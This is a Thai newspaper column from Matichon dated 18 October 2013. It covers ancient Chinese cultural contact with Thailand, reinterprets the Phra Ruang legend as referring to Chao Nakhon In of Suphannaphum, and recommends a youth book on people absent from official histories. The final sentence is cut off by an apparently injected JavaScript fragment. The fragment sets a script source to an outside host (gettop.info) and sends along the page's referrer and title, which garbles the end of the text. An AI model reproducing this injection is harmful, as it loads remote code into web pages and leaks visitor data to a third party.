มติชนรายวัน ฉบับประจำวันศุกร์ที่ 18 ตุลาคม 2556

 

จีนเข้าถึงไทย 2,000 ปีมาแล้ว

          นายกฯจีนมาเยือนไทย เป็นลักษณะความสัมพันธ์ทางเศรษฐกิจการเมืองในโลกปัจจุบัน แต่ในอดีตเคยเกี่ยวข้องกันทางวัฒนธรรมดึกดำบรรพ์

          วัฒนธรรมฮั่นจากจีนเข้าถึงดินแดนไทยในสุวรรณภูมิ อย่างน้อย 2,000 ปีมาแล้ว

          เอกสารจีนยุคนั้นบันทึกข้อความเรียกบ้านเมืองบริเวณลุ่มน้ำท่าจีน-แม่กลองว่าจินหลิน หรือกิมหลิน มีความหมายตรงกับชื่อสุวรรณภูมิหรืออู่ทอง

          นอกจากนั้น ยังพบวัฒนธรรมกลองทอง(หรือมโหระทึก) จากดินแดนจีนภาคใต้ แพร่หลายถึงดินแดนลุ่มน้ำโขง, ลุ่มน้ำเจ้าพระยา, และชายฝั่งทะเลด้วย

 

พระร่วงจากสุพรรณ ไปเมืองจีน

          พระร่วงไปเมืองจีน แล้วได้ช่างจีนมาทำเครื่องสังคโลก เป็นตำนานนิทานไทยที่ตำราไทยเชื่อกันมานานจนทุกวันนี้ว่าหมายถึงพ่อขุนรามคำแหงแห่งกรุงสุโขทัย

          แต่ไม่เคยพบหลักฐานสนับสนุนว่าเป็นจริง

          ตรงข้าม กลับมีหลักฐานเอกสารจีนสนับสนุนเรื่องเจ้านครอินทร์ โอรสกษัตริย์แห่งรัฐสุพรรณภูมิ(เชื้อสายตระกูลพระร่วง) ไปเมืองจีน แล้วเคยอยู่เมืองจีนจริงๆ

          ดังนั้น พระร่วงในตำนานนิทานนี้จึงหมายถึงเจ้านครอินทร์แห่งรัฐสุพรรณภูมิในดินแดนสยาม ที่เอกสารจีนเรียกเสียน, เสียม

          ต่อมาจีนสนับสนุนเจ้านครอินทร์ยกกำลังจากสุพรรณภูมิ(สุพรรณบุรี) ยึดครองเป็นกษัตริย์กรุงศรีอยุธยา(สมเด็จพระนครินทราธิราช พ.ศ. 1952-1967) แล้วสถาปนาเป็นราชอาณาจักรสยามแห่งแรก(ในอารักขาของจีน)

          ความเป็นกรุงศรีอยุธยาอย่างแท้จริงเริ่มที่เจ้านครอินทร์ แต่เรื่องนี้ไม่มีในประวัติศาสตร์แห่งชาติ ด้วยเหตุผลทางการเมืองราชสำนักสมัยหลัง

 

Young หรือเกิน Young ก็ต้องอ่าน

          50 คนดังนอกตำรา โดย ชานันท์ ยอดหงษ์ (M Young สำนักพิมพ์มติชน 2556) มีชื่อแปลกๆ เช่น

          พ่อขุนศรีนาวนำถุม, สมเด็จพระมหาเถรศรีศรัทธาราชจุฬามุนี, สุลต่านอิสมาเอล ชาฮ์, สุลต่านมุซาฟาร์ ชาฮ์, สุลต่านตึงกู สุลัยมาน ชาฮ์, รายาฮีเยา, เจ้าราชครูหลวงโพนสะเม็ก, กรมหลวงนรินทรเทวี “เจ้าครอกวัดโพธิ์”, อำแดงเหมือน, อำแดงจั่น, แอนนา เลียวโนเวนส์, พระยาวิชิตภักดี ตึงกู อับดุลกอเดร์ กามารุดดิน, พระองค์เจ้าปฤษฎางค์, ร.อ. ขุนทวยหาญพิทักษ์ (เหล็ง ศรีจันทร์), หะยีสุหลง อับดุลกาเดร์, ฯลฯ

          หนังสือชุด M Young เขาบอกว่าหมายถึงสำหรับเด็กและเยาวชน

          แต่พวกวัยเกิน Young ก็ต้องหาอ่านด้วย เพราะคนดังนอกตำราจำนวนไม่น้อยไม่มีในตำราทางการ จึงไม่เคยรู้มาก่อนs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;